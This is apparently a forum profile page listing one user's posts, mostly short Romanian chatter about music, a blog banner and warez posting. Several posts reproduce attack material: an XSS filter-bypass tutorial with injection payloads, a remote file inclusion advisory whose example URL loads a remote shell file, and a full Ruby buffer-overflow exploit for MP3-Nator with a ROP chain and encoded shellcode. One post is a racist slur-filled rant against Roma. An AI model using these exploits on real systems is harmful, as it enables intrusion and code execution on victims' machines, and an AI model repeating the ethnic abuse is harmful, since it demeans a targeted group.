-
Posts
1577 -
Joined
-
Last visited
-
Days Won
10
Everything posted by Gonzalez
-
Folositi Multi Poster 4 si adaugati template-uri cu site-uri si vin mai repede banii, sau postazi manual la site-urile mari de warez. -Gonzalez
-
As avea nevoie de un banner pentru blog. Cerinte: - text: Devilived.net - sa fie 1300x400 sau mai mic - sa includa logo-ul - culoarea sa fie albastra (deschis la culoara daca se poate) - sa arate cat de cat misto Recompensa: - link-ul tau pe blog ( aprox 200 vizitatori pe zi, si e in crestere) Vizitati blogul pentru a va uita cam la marimea bannerului. Blog: THE DUMP :: DeviLiveD.NeT Multumesc. -Gonzalez
-
B.U.G Mafia - Ingerii pierduti.mp3 -Gonzalez
-
Ma rup si ma uit vreo 2 ore la clip, mersi pax. -Gonzalez
-
La cabana mea la munte. -Gonzalez
-
Cel mai tare CWalk: -Gonzalez
-
Mersi Neme. -Gonzalez
-
Freddie Gibbs - The Ghetto.mp3 -Gonza;ez
-
Tigani borati, sa ma pis pe rasa lor de tigani , cacatii dracului. Tiganu TOT TIGAN RAMANE, mortii lor. Conecter si gorila aia mica sa suga. -Gonzalez
-
Astia toti au probleme. -Gonzalez
-
Afaceri mari. -Gonzalez
-
Imi place ca scrie: Conecter pe cruce in rasa masi de tigan. Tare piesa si videoclipul. -Gonzalez
-
Cand vi acasa Neme adu ceva thailandeze bune. -Gonzalez
-
Thanks. -Gonzalez
-
Primul Zeitgeist mi-a placut, astept pe acesta sa vad cum e. -Gonzalez
-
How to Perform Cryptanalysis with Rainbow Tables
Gonzalez replied to Nytro's topic in Tutoriale in engleza
Interesant. -Gonzalez -
Mersi. -Gonzalez
-
Romania, te iubesc! Ce spun hainele pe care le purtam despre noi?
Gonzalez replied to Krisler12™'s topic in Off-topic
Rusine Romania. Tara in care nimic nu se termina. -Gonzalez -
Mersi pentru informatii. -Gonzalez
-
Mult mai bun si fain e CS Source pe deasupra mai popular. -Gonzalez
-
############################################# #Title : XSS, how to bypass filters # #Author : k3nz0 # #Contact : o9p@hotmail.fr # #Category : Papers # #Website : k3nz0.com # ############################################# #################Tunisian#################### ##################Hacker##################### ############################################# This lessons is devided into 3 parts : [1] Introduction [2] Types of filters [3] Conclusion [1] Introduction : Nowadays, most of "securised" websites, make filters to don't allow cross site scripting "injections", however, we can bypass these filters by using the methods shown below [2] Types of filters : We will learn, how to bypass these xss filters : [+]Bypass magic_quotes_gpc (if it's on ) [+]Bypass with cryption in full html [+]Bypass with Obfuscation [+]Bypass with trying around method ############################################ [+]Bypass magic_quotes_gpc When magic_quotes_gpc is on, it means that the server doesn't allow, ", / and ' (it depends) to bypass it we use : String.fromCharCode() We write our code, in the () crypted in ASCII exemple : String.fromCharCode(107, 51, 110, 122, 48) (Here I crypted k3nz0 in ascii : 107, 51, 110, 122, 48 And we use it : <script>String.fromCharCode(107, 51, 110, 122, 48)</script> We will see : k3nz0 We bypassed magic_quotes_gpc ############################################# [+] Bypass with cryption in full html : Very simple, we have to encode our code in full HTTP! Our code : <script>alert('i am here')</script> And in full HTTP : %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%61%6D%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E Now, you can inject it ! Notice that you can use the tool "Coder" to do encode it in full HTTP We bypassed filter. ############################################# [+] Bypass with Obfuscation : Very simple too, this filter, don't allows for exemple these words : -script -alert To bypass it, you change "script" with for exemple "sCriPt", and "alert" with "ALerT" ! For exemple : <ScriPt>ALeRt("i am here")</scriPt> We bypassed the filter. ############################################## [+] Bypass with trying around method : Generally, it is in the searchs scripts, we just add "> at the begining to close current fields : exemple : http://target.com/search.php?search="><script>alert("hello")</script> We bypassed the filter. ############################################### [3] Conclusion : It was, how we can bypass xss filters, and how to inject our code This lesson is explained by k3nz0 Thank you for reading GREETZ : ALLAH ! Aymanos, v1r, kannibal615 , born to kill, & more.. ################################################
-
======================================================== = Author: Fl0riX - Bug Researchers = Application Name : WebRCSdiff 0.9 = Vulnerable Type: Remote File Inclusion = Download: http://sourceforge.net/projects/webrcsdiff/files/webrcsdiff/0.9%20Release/webrcsdiff-0.9.tar.zip/download = Risk : High = Infection: Uzaktan Dosya Dahil edilebilir. ======================================================== = Error c0d3; include ("$doc_root/dir_config.php"); ======================================================== = Example; site/viewver?doc_root=http://fl0rix/shell.txt? ======================================================== -Gonzalez
-
# Exploit Title: Exploit Buffer Overflow MP3-Nator (SEH - DEP BYPASS) # Date: 18-11-2010 # Author: Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com # Credit/Bug Found By: C4SS!0 G0M3S # Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http://files.brothersoft.com/mp3_audio/players/mp3nator.zip # Version: 2.0 # Tested on: Windows XP SP3 EN - Latest Update (VMWARE FUSION - Version 3.1.1) # CVE: N/A #! /usr/bin/env ruby filename = 'crash.plf' # ./msfpayload windows/exec CMD=calc EXITFUNC=seh R | ./msfencode -e x86/alpha_mixed -b '\x00' -t ruby # [*] x86/alpha_mixed succeeded with size 456 (iteration=1) shellcode = "\x89\xe3\xda\xcf\xd9\x73\xf4\x58\x50\x59\x49\x49\x49\x49" + "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" + "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" + "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" + "\x42\x75\x4a\x49\x49\x6c\x4d\x38\x4d\x59\x47\x70\x43\x30" + "\x47\x70\x43\x50\x4e\x69\x48\x65\x50\x31\x48\x52\x43\x54" + "\x4c\x4b\x51\x42\x46\x50\x4e\x6b\x50\x52\x44\x4c\x4c\x4b" + "\x50\x52\x46\x74\x4e\x6b\x51\x62\x45\x78\x46\x6f\x4c\x77" + "\x43\x7a\x47\x56\x50\x31\x49\x6f\x45\x61\x49\x50\x4e\x4c" + "\x47\x4c\x45\x31\x43\x4c\x47\x72\x44\x6c\x51\x30\x4f\x31" + "\x48\x4f\x46\x6d\x43\x31\x49\x57\x4b\x52\x4a\x50\x46\x32" + "\x43\x67\x4c\x4b\x46\x32\x46\x70\x4e\x6b\x43\x72\x47\x4c" + "\x47\x71\x48\x50\x4c\x4b\x47\x30\x43\x48\x4b\x35\x4b\x70" + "\x50\x74\x43\x7a\x47\x71\x4e\x30\x42\x70\x4c\x4b\x51\x58" + "\x42\x38\x4c\x4b\x42\x78\x51\x30\x46\x61\x48\x53\x49\x73" + "\x47\x4c\x43\x79\x4e\x6b\x44\x74\x4e\x6b\x45\x51\x49\x46" + "\x46\x51\x49\x6f\x45\x61\x4b\x70\x4c\x6c\x4f\x31\x48\x4f" + "\x46\x6d\x43\x31\x4a\x67\x47\x48\x4d\x30\x50\x75\x48\x74" + "\x47\x73\x43\x4d\x4a\x58\x45\x6b\x43\x4d\x47\x54\x42\x55" + "\x4b\x52\x50\x58\x4c\x4b\x50\x58\x45\x74\x47\x71\x4e\x33" + "\x51\x76\x4e\x6b\x44\x4c\x42\x6b\x4e\x6b\x46\x38\x45\x4c" + "\x45\x51\x4e\x33\x4e\x6b\x44\x44\x4c\x4b\x46\x61\x4a\x70" + "\x4f\x79\x50\x44\x44\x64\x44\x64\x51\x4b\x43\x6b\x51\x71" + "\x43\x69\x50\x5a\x42\x71\x4b\x4f\x4d\x30\x46\x38\x43\x6f" + "\x50\x5a\x4c\x4b\x47\x62\x48\x6b\x4f\x76\x43\x6d\x43\x5a" + "\x43\x31\x4c\x4d\x4e\x65\x48\x39\x45\x50\x47\x70\x47\x70" + "\x46\x30\x42\x48\x46\x51\x4e\x6b\x42\x4f\x4e\x67\x49\x6f" + "\x4e\x35\x4d\x6b\x4b\x4e\x46\x6e\x44\x72\x4a\x4a\x50\x68" + "\x4c\x66\x4a\x35\x4f\x4d\x4f\x6d\x4b\x4f\x48\x55\x47\x4c" + "\x47\x76\x43\x4c\x46\x6a\x4d\x50\x4b\x4b\x4d\x30\x44\x35" + "\x45\x55\x4f\x4b\x47\x37\x47\x63\x43\x42\x50\x6f\x51\x7a" + "\x45\x50\x42\x73\x4b\x4f\x49\x45\x45\x33\x43\x51\x50\x6c" + "\x51\x73\x45\x50\x47\x7a\x41\x41" junk1 = 'A' * 28 # ROP1 rop1 = '' rop1 << [0x71ABDAC3].pack('V') # PUSH ESP # POP ESI # RETN [Module : WS2_32.dll] rop1 << [0x71ABDC56].pack('V') # MOV EAX,ESI # POP ESI # RETN [Module : WS2_32.dll] rop1 << "DEAD" # PADDING rop1 << [0x1001595E].pack('V') # ADD ESP,20 # RETN - xaudio.dll # VIRTUALPROTECT PARAMETERS params = '' params << [0x7C801AD4].pack('V') # VirtualProtect params << 'WWWW' # return address [ PARAM #1 ] params << 'XXXX' # lpAddress [ PARAM #2 ] params << 'YYYY' # Size [ PARAM #3 ] params << 'ZZZZ' # flNewProtect [ PARAM #4 ] params << [0x5ADA1005].pack('V') # writeable address params << 'BEEF' * 2 # PADDING # ROP2 - [ PARAM #1 ] rop2 = '' rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll] rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll] rop2 << "BEEF" # PADDING rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll] rop2 << 'BEEF' # PADDING rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll] rop2 << 'BEEF' # ROP2 - [ PARAM #2 ] rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll] rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll] rop2 << 'BEEF' # PADDING rop2 << [0x77157D1D].pack('V') * 4 # INC ESI # RETN [Module : oleaut32.dll] rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll] rop2 << 'BEEF' # rop2 - [ PARAM #3 ] rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll] rop2 << [0x77E8559E].pack('V') # XOR EAX,EAX # RETN [Module : RPCRT4.dll] rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll] rop2 << 'BEEF' # PADDING rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll] rop2 << 'BEEF' # PADDING rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll] rop2 << 'BEEF' # PADDING rop2 << [0x77157D1D].pack('V') * 4 # INC ESI # RETN [Module : oleaut32.dll] rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll] rop2 << 'BEEF' # rop2 - [ PARAM #4 ] rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll] rop2 << [0x77E8559E].pack('V') # XOR EAX,EAX # RETN [Module : RPCRT4.dll] rop2 << [0x77C4EC1D].pack('V') # ADD EAX,40 # POP EBP # RETN [Module : msvcrt.dll] rop2 << 'BEEF' # PADDING rop2 << [0x77157D1D].pack('V') * 4 # INC ESI # RETN [Module : oleaut32.dll] rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll] rop2 << 'BEEF' # POINT ESP TO VIRTUALPROTECT rop2 << [0x7475B960].pack('V') # XCHG EAX,ESP # RETN [Module : MSCTF.dll] nops = "\x90" * 310 junk1 = junk1 + rop1 + params + rop2 + nops + shellcode + 'A' * (4112 - (junk1 + rop1 + params + rop2 + nops + shellcode).length) seh = [0x10019C35].pack('V') # ADD ESP,41C # RETN - xaudio.dll junk2 = 'C' * (10000 - (junk1 + seh).length) xploit = junk1 + seh + junk2 File.open(filename,'w') do |fd| fd.write xploit puts "file size : #{xploit.length.to_s}" end -Gonzalez